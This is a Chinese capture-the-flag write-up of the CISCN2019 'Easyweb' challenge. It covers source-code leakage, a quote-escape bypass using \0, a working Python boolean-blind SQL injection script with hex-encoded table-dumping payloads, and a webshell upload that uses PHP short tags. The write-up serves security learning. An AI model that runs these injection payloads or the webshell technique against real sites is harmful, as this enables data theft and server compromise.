刷题[CISCN2019 总决赛 Day2 Web1]Easyweb

解题思路

打开网页是这样一个登陆框，随机试了一下常见弱密钥，二次注入等。均是返回不同的猫咪图案

不同的id对应不同的猫咪图案。经测试，返回的id应该是无序，随机的。感觉这里有可能存在注入点，但是测试好像没有报错的情况，先记着。

源码没东西，robots.txt呢，发现了东西。

应该是存在源码泄露了，但是要找出是哪个php文件。index.php.bak不对，user.php.bak不对。这里暂时没思路了。扫下目录，看看有没有后台

扫描，吓了一跳，发现怎么有这么多东西，这是我第一次见到扫出来这么多的了。但是好像所有的文件都会返回相同的登陆框页面，猜测这里有重定向

想了一会儿，想到猫咪的页面image.php

image.php.bak终于找到了，存在源码泄露

代码审计

<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

这一看不是老布尔盲注了吗，最近刷了好多这种题啊。id为0正好报错，id为1显示正确

主要考虑：

怎么绕过对单引号的过滤，闭合id的单引号，把危险代码放在path变量中

不能用单引号闭合单引号，那么我们考虑能不能用\转义单引号呢。

这里过滤不算特别严格，并且使用的是str_replace这种有缺陷的函数。

我们反推：

1. 最后要是\，那么经过str_replace函数处理之前可以是\\0（函数中的\\0，第一个斜杠转义\，表示成真实的\）
2. \\0在经过addslashes函数处理之前可以是\0。

那么就出来了，我们在id处传入\0，即可在经过一系列处理后变成\，转义单引号。

语句即变成：

select * from images where id='\' or path='{$path}'

编写exp

import requests
url = "http://0fc26848-c4ee-46f6-b15d-ad97821f76e2.node3.buuoj.cn/image.php?id=\\0&path="
result = ""
for i in range(1,30):
	low = 32
	high =128
	mid = (high+low)//2
	while(low<high):
		payload = "or id=if(ascii(substr((database()),{0},1))>{1},1,0)%23".format(i,mid)
		html = requests.get(url+payload)
		print(low,high,mid,":")
		print(url+payload)
		if "JFIF" in html.text:
			low = mid+1
		else:
			high = mid
		mid = (high+low)//2
	if(low ==32 or high==128):
		break
	result = result + chr(mid)
	print(result)
print("flag: " ,result)

爆出来当前数据库，ciscnfinal

爆表

or id=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x636973636e66696e616c ),{0},1))>{1},1,0)%23

因为单引号被过滤，直接可以用16进制绕过。爆出表：images,users

知道了password应该在users表中，爆列名。

爆出password：e18be75a8a54cf38a377。成功登陆

getshell

传入一些文件后发现，它是把传入的文件写入

/logs/upload.4ee0861649284ba13ea8e84271cc35a7.log.php

写入的文件是php文件，也就是说我们要把一句话作为文件名。

这里发现打不进去。在网上看到有一种叫短标签的方式

在php的配置文件（php.ini）中有一个short_open_tag的值，开启以后可以使用PHP的短标签：(<? ?>)。

这是一个小tips学到了

然后蚁剑连本文件，flag在根目录下

总结思路

• 源码泄露
• 代码审计，布尔盲注，爆出密码
• 短标签绕过对文件名php的过滤

知识点

• 代码审计
• sql注入（布尔盲注）
• php特性